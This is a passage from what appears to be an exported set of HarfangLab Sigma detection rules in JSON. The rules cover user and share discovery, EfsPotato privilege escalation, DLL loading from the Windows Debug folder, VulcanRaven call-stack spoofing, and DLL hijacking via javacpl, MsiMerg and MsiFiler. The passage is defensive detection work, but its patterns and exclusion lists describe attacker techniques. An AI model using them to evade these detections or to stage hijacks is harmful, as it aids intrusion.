"content": "title: Local User List Discovered via query.exe\nid: b0b2818b-2803-4a79-b1f2-7a0f323fc955\ndescription: |\n Detects the execution of \"query user\" to discover the list of local users.\n Attackers may attempt to identify the primary user, the currently logged-in user, the set of users that commonly use a system, or whether a user is actively using the system.\n It is recommended to analyze the parent and grandparent processes and their respective child processes to look for malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2021/05/17\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\query.exe'\n # Renamed binaries\n - OriginalFileName: 'query.exe'\n selection_cmd:\n CommandLine|contains: 'user'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_amazon:\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - '-NonInteractive'\n - '-ExecutionPolicy AllSigned'\n - '?:\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\'\n\n exclusion_sharepoint:\n ParentCommandLine|contains: '?:\\Program Files\\windowspowershell\\modules\\sharepointserver\\sharepoint.ps1'\n\n exclusion_nuance:\n ProcessParentOriginalFileName: 'SoD.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Nuance Communications Inc.'\n\n exclusion_xgate:\n ProcessGrandparentImage|endswith: '\\xGate.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature:\n - 'Axeda Corporation'\n - 'PTC Inc.'\n\n exclusion_forescout:\n - ProcessParentCommandLine:\n - 'cscript //U //nologo ?:\\Windows\\\\*\\fstmpsc\\fs_action_*_body.vbs *'\n - 'cscript //U //nologo ?:\\Windows\\\\*\\fstmp\\fs_action_*_body.vbs *'\n - 'cscript //U //nologo ?:\\Windows\\\\*\\forescout\\fs_action_*_body.vbs *'\n - ProcessAncestors|contains: '|?:\\Program Files\\ForeScout SecureConnector\\SecureConnector.exe|'\n\n exclusion_medical_dragon:\n ProcessParentImage|endswith: '\\Nuance\\Dragon Medical One\\sod.exe'\n\n exclusion_grandparent:\n ProcessGrandparentImage:\n - '?:\\Windows\\Prey\\versions\\\\*\\bin\\node.exe'\n - '?:\\ProgramData\\NinjaRMMAgent\\components\\app-patching-orbit\\NinjaOrbit.exe'\n - '?:\\Windows\\System32\\WUDFHost.exe'\n\n exclusion_generic_parentcommandline:\n ProcessParentCommandLine:\n - '*powershell.exe *-f* ?:\\Scripts\\\\*.ps1'\n - '*powershell.exe \\\\\\\\*.ps1'\n - '*powershell.exe *?:\\ProgramData\\\\*.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0b2818b-2803-4a79-b1f2-7a0f323fc955",
"rule_name": "Local User List Discovered via query.exe",
"rule_description": "Detects the execution of \"query user\" to discover the list of local users.\nAttackers may attempt to identify the primary user, the currently logged-in user, the set of users that commonly use a system, or whether a user is actively using the system.\nIt is recommended to analyze the parent and grandparent processes and their respective child processes to look for malicious content or actions.\n",
"rule_creation_date": "2021-05-17",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0fcc9c7-a08a-4ab6-bc1f-d71cb1f63179",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610214Z",
"creation_date": "2026-03-23T11:45:34.610217Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610225Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/zcgonvh/EfsPotato/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_efs_potato_named_pipe.yml",
"content": "title: EfsPotato Named Pipe Created\nid: b0fcc9c7-a08a-4ab6-bc1f-d71cb1f63179\ndescription: |\n Detects the creation of a named pipe related to the EfsPotato privilege escalation tool.\n EfsPotato exploits the SeImpersonatePrivilege, usually held by services, to elevate privileges.\n It is recommended to investigate the process that created the named pipe and its potential child processes, as well as processes that connected to the named pipe.\nreferences:\n - https://github.com/zcgonvh/EfsPotato/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/02/01\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.NamedPipe\n - classification.Windows.HackTool.EfsPotato\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName|endswith: '\\\\????????-????-????-????-????????????\\pipe\\srvsvc'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0fcc9c7-a08a-4ab6-bc1f-d71cb1f63179",
"rule_name": "EfsPotato Named Pipe Created",
"rule_description": "Detects the creation of a named pipe related to the EfsPotato privilege escalation tool.\nEfsPotato exploits the SeImpersonatePrivilege, usually held by services, to elevate privileges.\nIt is recommended to investigate the process that created the named pipe and its potential child processes, as well as processes that connected to the named pipe.\n",
"rule_creation_date": "2024-02-01",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b12c49d5-235d-4f76-978f-983e26a93de7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083480Z",
"creation_date": "2026-03-23T11:45:34.083482Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083486Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/04/30/tricky-pyxie/",
"https://attack.mitre.org/techniques/T1135/"
],
"name": "t1135_net_share.yml",
"content": "title: Local SMB Shares Enumerated via net.exe\nid: b12c49d5-235d-4f76-978f-983e26a93de7\ndescription: |\n Detects the execution of 'net1.exe' with the 'share' argument.\n Adversaries can use 'net share' during the discovery phase to query shared drives on the local system.\n It is recommended to investigate the parent process for suspicious activities.\n If this activity is recurrent in your environment, it is highly recommended to whitelist the software or scripts responsible for this action.\nreferences:\n - https://thedfirreport.com/2020/04/30/tricky-pyxie/\n - https://attack.mitre.org/techniques/T1135/\ndate: 2022/11/14\nmodified: 2025/05/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1135\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_commandline:\n CommandLine|contains: ' share'\n GrandparentImage|startswith: '?:\\'\n\n filter_net:\n CommandLine|startswith:\n - '?:\\Windows\\system32\\net1 start '\n - '?:\\Windows\\system32\\net1 stop '\n - '?:\\WINDOWS\\system32\\net1 use '\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_gathernetwork:\n GrandparentCommandLine: '?:\\Windows\\System32\\cmd.exe /c net share >> config\\FileSharing.txt'\n\n exclusion_ipam:\n - CommandLine|startswith: '?:\\Windows\\system32\\net1 share dhcpaudit=?:\\Windows\\system32\\dhcp /grant:IPAMUG@'\n - GrandparentCommandLine|contains: '\\Machine\\Scripts\\Startup\\ipamprovisioning.ps1 DHCP IPAMUG'\n\n exclusion_connectwise:\n GrandparentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n exclusion_services:\n Ancestors|endswith: '|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_berger-levrault:\n CommandLine: '?:\\Windows\\system32\\net1 share editions$=?:\\Berger-Levrault\\SM\\editions'\n\n exclusion_centrastage:\n GrandparentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\ProgramData\\CentraStage\\Packages\\\\*#\\command.bat'\n\n exclusion_septeo:\n ProcessGrandparentImage|endswith: '\\eSeasonLiveUpdateServeurService.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'SAS SEPTEO HOSPITALITY SOLUTIONS'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b12c49d5-235d-4f76-978f-983e26a93de7",
"rule_name": "Local SMB Shares Enumerated via net.exe",
"rule_description": "Detects the execution of 'net1.exe' with the 'share' argument.\nAdversaries can use 'net share' during the discovery phase to query shared drives on the local system.\nIt is recommended to investigate the parent process for suspicious activities.\nIf this activity is recurrent in your environment, it is highly recommended to whitelist the software or scripts responsible for this action.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-05-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1135"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b13d158e-75df-4ac8-9c77-d0b173c027f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071233Z",
"creation_date": "2026-03-23T11:45:34.071235Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071239Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://securelist.com/toddycat-keep-calm-and-check-logs/110696/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_debug_folder.yml",
"content": "title: DLL Loaded from Debug Folder\nid: b13d158e-75df-4ac8-9c77-d0b173c027f1\ndescription: |\n Detects the suspicious loading of a DLL from the \"\\Windows\\Debug\" folder.\n This is an uncommon directory for DLLs, often exploited by attackers for malicious purposes.\n It is recommended to analyze the loaded DLL for malicious content, check file integrity, and review process behavior to identify potential threats.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://securelist.com/toddycat-keep-calm-and-check-logs/110696/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/12/22\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\windows\\debug\\'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b13d158e-75df-4ac8-9c77-d0b173c027f1",
"rule_name": "DLL Loaded from Debug Folder",
"rule_description": "Detects the suspicious loading of a DLL from the \"\\Windows\\Debug\" folder.\nThis is an uncommon directory for DLLs, often exploited by attackers for malicious purposes.\nIt is recommended to analyze the loaded DLL for malicious content, check file integrity, and review process behavior to identify potential threats.\n",
"rule_creation_date": "2023-12-22",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b144a6e6-ed47-40a0-a45b-6a1928f2c29d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070065Z",
"creation_date": "2026-03-23T11:45:34.070067Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070072Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_rem_thr_callstack_spoofing_related_to_vulcan_raven.yml",
"content": "title: Spoofed Thread Call Stack Related to VulcanRaven\nid: b144a6e6-ed47-40a0-a45b-6a1928f2c29d\ndescription: |\n Detects arbitrary call stacks related to the VulcanRaven PoC.\n VulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\n Attackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\n It is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\nreferences:\n - https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/08/25\nmodified: 2025/11/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection_wmi_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'CorperfmonExt.dll'\n - 'kernel32.dll'\n - 'ntdll.dll'\n StackTrace|contains:\n - 'CorperfmonExt.dll+0xc669'\n - 'CorperfmonExt.dll+0xc71b'\n - 'CorperfmonExt.dll+0x2fde'\n\n selection_sysmain_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'sysmain.dll'\n - 'svchost.exe'\n - 'sechost.dll'\n StackTrace|contains:\n - 'sysmain.dll+0x80e5f'\n - 'sysmain.dll+0x60ce6'\n - 'sysmain.dll+0x2a7d3'\n\n selection_rpc_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'lsm.dll'\n - 
'RPCRT4.dll'\n StackTrace|contains:\n - 'RPCRT4.dll+0x79633'\n - 'RPCRT4.dll+0x13711'\n - 'RPCRT4.dll+0xdd77b'\n - 'lsm.dll+0xe959'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b144a6e6-ed47-40a0-a45b-6a1928f2c29d",
"rule_name": "Spoofed Thread Call Stack Related to VulcanRaven",
"rule_description": "Detects arbitrary call stacks related to the VulcanRaven PoC.\nVulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions; it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\nAttackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\nIt is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-11-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b150c8ae-7c90-484f-895b-8905784895c8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601382Z",
"creation_date": "2026-03-23T11:45:34.601386Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601393Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1558916870937395200?t=0_vqv6hJ0-dyKJJTSdSATw&s=19",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_javacpl.yml",
"content": "title: DLL Hijacking via javacpl.exe\nid: b150c8ae-7c90-484f-895b-8905784895c8\ndescription: |\n Detects potential Windows DLL Hijacking via javacpl.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate javacpl executable alongside a malicious msvcr100.dll.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1558916870937395200?t=0_vqv6hJ0-dyKJJTSdSATw&s=19\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'javacpl.exe'\n ProcessSignature: 'Oracle America, Inc.'\n ImageLoaded|endswith:\n - '\\msvcr100.dll'\n - '\\msvcr100_clr0400.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b150c8ae-7c90-484f-895b-8905784895c8",
"rule_name": "DLL Hijacking via javacpl.exe",
"rule_description": "Detects potential Windows DLL Hijacking via javacpl.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate javacpl executable alongside a malicious msvcr100.dll.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b167c502-a7cd-4785-8c74-8a3947de4a7f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081980Z",
"creation_date": "2026-03-23T11:45:34.081982Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081986Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msimerg.yml",
"content": "title: DLL Hijacking via MsiMerg.exe\nid: b167c502-a7cd-4785-8c74-8a3947de4a7f\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiMerg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiMerg.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 
1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b167c502-a7cd-4785-8c74-8a3947de4a7f",
"rule_name": "DLL Hijacking via MsiMerg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiMerg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b1782bf1-6bfb-4197-a276-32e83634bc02",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081763Z",
"creation_date": "2026-03-23T11:45:34.081765Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081769Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msifiler.yml",
"content": "title: DLL Hijacking via MsiFiler.exe\nid: b1782bf1-6bfb-4197-a276-32e83634bc02\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiFiler.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiFiler.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and 
not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
